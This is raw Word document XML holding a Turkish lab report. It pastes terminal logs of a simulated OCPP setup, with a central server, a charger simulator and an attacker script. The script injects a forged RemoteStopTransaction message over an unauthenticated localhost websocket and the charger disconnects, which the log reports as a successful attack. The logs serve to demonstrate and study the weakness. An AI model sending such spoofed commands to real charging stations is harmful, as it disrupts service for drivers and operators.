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E6BB86" wp14:paraId="1B0E1B14" wp14:textId="6883BB89">
      <w:pPr>
        <w:pStyle w:val="Normal"/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Benden istediğin log kayıtları (terminal çıktıları) aşağıdadır. Üç terminaldeki çıktıyı da sırasıyla kopyaladım. Saldırının başarılı olduğu, EVSE'nin bağlantıyı kestiği noktadan (Terminal 2'deki </w:t>
      </w:r>
      <w:r w:rsidRPr="76E6BB86" w:rsidR="7002E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BAGLANTI KESILDI</w:t>
      </w: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mesajı) açıkça görülüyor.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="071AFE02" wp14:textId="01E3AED5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--- Merkezi Sistem Sunucusu (CSMS) baslatiliyor... --- CSMS, ws://0.0.0.0:8080 adresinde dinlemede. [BAGLANDI] Yeni EVSE baglandi: /EVSE_MITM_TEST [EVSE_MITM_TEST] GELEN MESAJ: [2, "1", "BootNotification", {"chargePointModel": "MITM-Sim", "chargePointVendor": "HACK"}] [EVSE_MITM_TEST] GELEN MESAJ: [2, "2", "Heartbeat", {}] [EVSE_MITM_TEST] GELEN MESAJ: [2, "3", "Heartbeat", {}] [EVSE_MITM_TEST] GELEN MESAJ: [2, "4", "Heartbeat", {}] [BAGLANDI] Yeni EVSE baglandi: /EVSE_MITM_TEST [EVSE_MITM_TEST] GELEN MESAJ: [2, "999", "RemoteStopTransaction", {"transactionId": 12345}] [EVSE_MITM_TEST] Baglanti sonlandi. [EVSE_MITM_TEST] Baglanti kesildi.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="23A4CDC1" wp14:textId="51D0BF89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--- Sarj İstasyonu (EVSE) baslatiliyor: EVSE_MITM_TEST --- Basarili baglanti: ws://127.0.0.1:8080/EVSE_MITM_TEST -&gt; BootNotification gönderildi. &lt;- Yanit alindi: [3, "1", {"currentTime": "2025-12-15T11:00:00Z", "interval": 300, "status": "Accepted"}]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="3F4C1EC6" wp14:textId="65B445E5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Sarj Islemi Simulasyonu basladi (Heartbeat gonderiliyor)... -&gt; Heartbeat (2) gonderildi. Beklemede... &lt;- Yanit alindi: [3, "2", {}] -&gt; Heartbeat (3) gonderildi. Beklemede... &lt;- Yanit alindi: [3, "3", {}] -&gt; Heartbeat (4) gonderildi. Beklemede... &lt;- Yanit alindi: [3, "4", {}] -&gt; Heartbeat (5) gonderildi. Beklemede... &lt;- Yanit alindi: [3, "5", {}]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="1E2AF802" wp14:textId="50D76ABB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!!! BAGLANTI KESILDI! (RemoteStop basarili oldu) !!!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="6EA4E5B8" wp14:textId="451B9E71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--- Saldırgan Betigi Baslatiliyor --- Hedefe baglanti basarili: ws://127.0.0.1:8080/EVSE_MITM_TEST</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="100BCE2F" wp14:textId="06C52533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!!! SAHTE RemoteStopTransaction KOMUTU GONDERILIYOR !!! -&gt; Komut gonderildi. EVSE'nin kesilmesi bekleniyor...</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="76E6BB86" wp14:paraId="2A7AAF65" wp14:textId="76877252">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="76E6BB86" w:rsidR="7002E601">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[SALDIRI BAŞARILI] Komut gönderildi, ancak EVSE bağlantısı kesildiği için yanıt alınamadı.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="1DB4442F" wp14:textId="6133683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043FAA"/>
    <w:rsid w:val="7002E601"/>
    <w:rsid w:val="76E6BB86"/>
    <w:rsid w:val="7A04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3FAA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2AC7DDF0-774D-4CFB-96FF-33B2A1FFC7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2025-12-15T11:40:52.7404539Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-15T11:42:42.2334907Z</dcterms:modified>
  <dc:creator>aligiris23@hotmail.com</dc:creator>
  <lastModifiedBy>aligiris23@hotmail.com</lastModifiedBy>
</coreProperties>
</file>